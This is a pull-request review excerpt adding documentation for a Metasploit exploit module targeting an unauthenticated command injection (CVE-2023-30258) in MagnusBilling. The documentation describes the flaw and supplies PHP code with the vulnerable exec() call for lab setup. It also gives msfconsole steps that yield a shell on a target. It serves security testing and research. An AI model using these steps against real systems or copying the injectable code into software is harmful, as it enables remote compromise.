documentation/modules/exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258.md

```diff
@@ -0,0 +1,240 @@
+## Vulnerable Application
+`MagnusBilling` is an open source tool written in `PHP` and `JAVASCRIPT`, aimed at IP telephony providers.
+It provides a complete and powerful system for anyone to start an IP telephony provider.
+Unfortunately a command injection vulnerability exists in `MagnusBilling` versions 6 and 7.
+The vulnerability allows an unauthenticated user to execute arbitrary OS commands on the host, with the privileges of the web server.
+This is caused by a piece of demonstration code which is present in `lib/icepay/icepay.php`, with a call to `exec()` at line 753.
+The parameter to `exec()` includes the `GET` parameter `democ`, which is controlled by the user.
+
+An unauthenticated user is able to execute arbitrary OS commands.
+The commands run with the privileges of the web server process, typically `www-data`.
+At a minimum, this allows an attacker to compromise the billing system and its database.
+
+See this [attackerkb article](https://attackerkb.com/topics/DFUJhaM5dL/cve-2023-30258) for more information.
+
+## Installation
+This module has been tested on:
+- Debian 12.2 running on  VirtualBox 7 with MagnusBilling 7 installed.
+
+### Installation steps
+* Install Debian 11 or later on VirtualBox.
+* Follow these [instructions](https://linux.how2shout.com/install-debian-11-bullseye-on-virtualbox/).
+* Login into Debian Linux machine.
+* Switch to root with `su -` if needed.
+* Follow  the install instructions for either [MagnusBilling 7](https://github.com/magnussolution/magnusbilling7) or
+[MagnusBilling 6](https://github.com/magnussolution/magnusbilling6)
+* After successful installation, you can test the module with the verification steps listed at the **Verification** section.
+
+PS: If you have installed MagnusBilling 7, please update the `mbilling/lib/icepay/icepay.php` file at the web server root,
+typically `/var/www/html`, by adding the vulnerable code below.
+```php
+if (isset($_GET['demo'])) {
+
+    if ($_GET['demo'] == 1) {
+        exec("touch idepay_proccess.php");
+    } else {
+        exec("rm -rf idepay_proccess.php");
+    }
+}
+if (isset($_GET['democ'])) {
+    if (strlen($_GET['democ']) > 5) {
+        exec("touch " . $_GET['democ'] . '.txt');
+    } else {
+        exec("rm -rf *.txt");
+    }
+}
+```
+
+## Verification Steps
+- [x] Start `msfconsole`
+- [x] `use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258`
+- [x] `set rhosts <ip-target>`
+- [x] `set rport <port>`
+- [x] `set lhost <ip-attacker>`
+- [x] `set target <0=PHP, 1=Unix Command, 2=Linux Dropper>`
+- [x] `exploit`
+
+you should get a `shell` or `Meterpreter` session.
+```ShellSession
```

Comment:
There's a couple instances of this in this PR. 
```suggestion
```shell
```

Reply:
See https://github.com/rapid7/metasploit-framework/pull/18481/commits/bfff35eb63c478194e5a76b702be7dde2dd5728d.